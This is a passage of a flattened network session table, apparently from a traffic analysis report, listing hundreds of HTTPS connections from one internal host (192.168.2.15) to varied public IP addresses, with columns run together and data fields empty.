                                            13636192.168.2.1544668204.114.228.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13637192.168.2.1547062219.12.176.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13638192.168.2.155321496.117.174.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13639192.168.2.15351925.130.98.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13640192.168.2.154802419.76.251.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13641192.168.2.153819664.23.148.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13642192.168.2.1538208110.68.171.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13643192.168.2.154249098.97.30.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13644192.168.2.1556772110.63.34.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13645192.168.2.153397658.46.38.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13646192.168.2.1536184160.17.206.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13647192.168.2.1556874101.176.152.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13648192.168.2.1533890209.251.39.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13649192.168.2.1539534189.27.137.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13650192.168.2.155875893.8.193.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13651192.168.2.1555378116.112.16.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13652192.168.2.154932848.218.131.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13653192.168.2.1560626100.230.254.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13654192.168.2.155692284.103.7.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13655192.168.2.1551564180.192.39.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13656192.168.2.1546618158.63.161.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13657192.168.2.1548734197.115.234.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13658192.168.2.1536034162.13.46.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13659192.168.2.154396465.231.65.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13660192.168.2.154941454.76.140.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13661192.168.2.155503296.242.138.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13662192.168.2.155004620.71.144.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13663192.168.2.1549594155.173.188.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13664192.168.2.155931485.75.48.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13665192.168.2.1547462176.23.251.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13666192.168.2.1539028151.196.112.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13667192.168.2.153671020.172.67.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13668192.168.2.1559014117.30.180.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13669192.168.2.154913090.203.67.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13670192.168.2.154913667.0.133.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13671192.168.2.1553186116.177.53.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13672192.168.2.154136651.92.167.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13673192.168.2.1555586125.45.234.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13674192.168.2.155057462.224.26.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13675192.168.2.15582262.44.32.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13676192.168.2.153961054.181.215.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13677192.168.2.155224212.103.207.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13678192.168.2.155268297.138.145.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13679192.168.2.1556522119.185.32.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13680192.168.2.1533600102.235.171.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13681192.168.2.1536742142.170.80.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13682192.168.2.1545950159.201.235.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13683192.168.2.154814282.221.179.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13684192.168.2.1560360144.192.201.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13685192.168.2.153549868.25.89.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13686192.168.2.1534170158.146.166.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13687192.168.2.1543760182.41.136.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13688192.168.2.1535926107.72.46.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13689192.168.2.154040295.155.105.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13690192.168.2.1544970108.136.216.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13691192.168.2.1533394105.211.227.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13692192.168.2.155199666.75.72.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13693192.168.2.1536404179.44.224.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13694192.168.2.1540612208.155.99.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13695192.168.2.1560172222.254.78.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13696192.168.2.1533716222.48.28.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13697192.168.2.153990057.225.117.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13698192.168.2.155880849.111.162.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13699192.168.2.155062478.4.189.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13700192.168.2.1550058184.72.155.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13701192.168.2.154437467.154.213.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13702192.168.2.1548924182.169.69.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13703192.168.2.1559466131.242.95.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13704192.168.2.155579020.109.217.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13705192.168.2.155915669.103.5.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13706192.168.2.1556910145.253.82.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13707192.168.2.1552992114.137.16.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13708192.168.2.15498744.123.70.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13709192.168.2.1539904180.238.167.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13710192.168.2.1556380128.233.149.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13711192.168.2.1558724104.202.95.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13712192.168.2.1554392178.112.236.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13713192.168.2.15518101.72.232.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13714192.168.2.1546786183.129.21.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13715192.168.2.1543906165.0.147.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13716192.168.2.1543518170.11.246.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13717192.168.2.155302219.26.104.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13718192.168.2.1548642196.115.252.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13719192.168.2.154998244.8.190.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13720192.168.2.1537970164.40.234.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13721192.168.2.154607473.175.25.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13722192.168.2.15337861.100.44.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13723192.168.2.1535426160.92.199.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13724192.168.2.15453849.101.188.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13725192.168.2.155888477.86.110.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13726192.168.2.1533504174.160.68.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13727192.168.2.155978645.219.197.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13728192.168.2.1553980191.170.94.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13729192.168.2.155932041.212.140.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13730192.168.2.1555744118.121.229.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13731192.168.2.155774840.46.11.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13732192.168.2.1533524136.94.163.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13733192.168.2.1543016135.21.128.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13734192.168.2.154408442.91.74.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13735192.168.2.155386649.10.173.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13736192.168.2.155160857.212.88.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13737192.168.2.154084414.230.88.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13738192.168.2.15405402.78.105.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13739192.168.2.155269695.99.104.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13740192.168.2.1540244205.50.70.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13741192.168.2.1560786217.207.37.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13742192.168.2.1557376121.13.152.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13743192.168.2.1535736199.213.5.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13744192.168.2.1560202191.123.55.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13745192.168.2.155572266.36.16.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13746192.168.2.1543302146.180.228.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13747192.168.2.1555886124.212.124.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13748192.168.2.155390024.176.92.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13749192.168.2.1544658186.229.185.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13750192.168.2.154311869.101.19.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13751192.168.2.155111844.19.7.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13752192.168.2.1554120129.221.101.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13753192.168.2.154393254.138.25.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13754192.168.2.154690662.6.22.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13755192.168.2.153864485.119.9.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13756192.168.2.154936682.42.46.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13757192.168.2.1544892100.247.221.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13758192.168.2.1544202176.223.181.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13759192.168.2.1550700188.19.251.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13760192.168.2.153893086.123.4.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13761192.168.2.1541316200.165.145.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13762192.168.2.1535328131.122.217.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13763192.168.2.153543823.72.159.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13764192.168.2.155075494.192.73.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13765192.168.2.154784682.85.224.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13766192.168.2.15599562.56.13.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13767192.168.2.155469842.65.200.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13768192.168.2.154281831.179.23.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13769192.168.2.1560624137.189.215.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13770192.168.2.1540126199.255.110.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13771192.168.2.153774466.219.121.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13772192.168.2.1543846134.217.9.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13773192.168.2.155242844.186.82.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13774192.168.2.1547052207.166.34.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13775192.168.2.1544530207.236.40.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13776192.168.2.155732020.243.211.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13777192.168.2.1551230182.41.138.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13778192.168.2.153463281.138.186.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13779192.168.2.1545582170.161.75.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13780192.168.2.153845645.9.163.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13781192.168.2.15480401.109.40.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13782192.168.2.154626063.3.216.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13783192.168.2.156027675.216.59.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13784192.168.2.1541550159.224.81.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13785192.168.2.1551840204.237.75.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13786192.168.2.1555416170.213.91.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13787192.168.2.1558122210.160.148.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13788192.168.2.1557326184.30.21.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13789192.168.2.155589251.133.164.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13790192.168.2.1537404143.217.115.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13791192.168.2.155579885.9.126.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13792192.168.2.153536077.84.154.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13793192.168.2.1537952132.128.63.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13794192.168.2.1560446167.75.180.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13795192.168.2.1560784155.65.242.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13796192.168.2.154340466.166.144.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13797192.168.2.1548412165.35.4.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13798192.168.2.1537490156.106.3.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13799192.168.2.1543548109.58.28.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13800192.168.2.154871444.49.225.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13801192.168.2.1544094125.58.235.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13802192.168.2.1541628219.183.237.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13803192.168.2.153529277.65.253.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13804192.168.2.1541928115.2.163.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13805192.168.2.155207692.240.91.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13806192.168.2.154775078.185.138.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13807192.168.2.154113464.217.127.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13808192.168.2.155873037.247.211.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13809192.168.2.1542128106.154.173.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13810192.168.2.155553489.81.63.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13811192.168.2.1540416211.119.252.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13812192.168.2.155570072.247.115.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13813192.168.2.153980894.63.194.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13814192.168.2.154755872.17.190.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13815192.168.2.1545344106.206.124.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13816192.168.2.1545718168.211.204.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13817192.168.2.155177858.34.210.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13818192.168.2.1555680109.176.156.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13819192.168.2.155871263.203.175.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13820192.168.2.1544586149.104.4.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13821192.168.2.1556418181.141.80.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13822192.168.2.1550858132.191.217.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13823192.168.2.1557990158.178.247.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13824192.168.2.155820872.25.172.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13825192.168.2.1553052148.67.95.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13826192.168.2.155961234.192.28.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13827192.168.2.1551860208.9.142.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13828192.168.2.1560170188.139.94.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13829192.168.2.1542550156.251.178.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13830192.168.2.15468488.181.60.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13831192.168.2.15514925.42.205.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13832192.168.2.153995643.138.101.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13833192.168.2.15443002.47.223.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13834192.168.2.15421582.17.196.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13835192.168.2.1553714169.132.86.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13836192.168.2.1542644108.85.195.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13837192.168.2.154553636.53.10.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13838192.168.2.1542656223.121.129.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13839192.168.2.154092684.199.40.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13840192.168.2.154769660.212.57.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13841192.168.2.1549730200.190.178.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13842192.168.2.1543072217.183.41.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13843192.168.2.155243861.143.174.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13844192.168.2.154031848.150.12.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13845192.168.2.155628086.137.177.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13846192.168.2.1549134197.15.7.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13847192.168.2.1555308175.162.28.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13848192.168.2.1536350195.40.41.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13849192.168.2.1557438200.216.1.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13850192.168.2.155585269.246.66.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13851192.168.2.154775842.215.241.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13852192.168.2.15386765.150.246.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13853192.168.2.154468273.33.102.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13854192.168.2.1555562167.8.248.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13855192.168.2.1559128149.125.191.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13856192.168.2.1535978207.209.181.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13857192.168.2.154235418.18.119.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
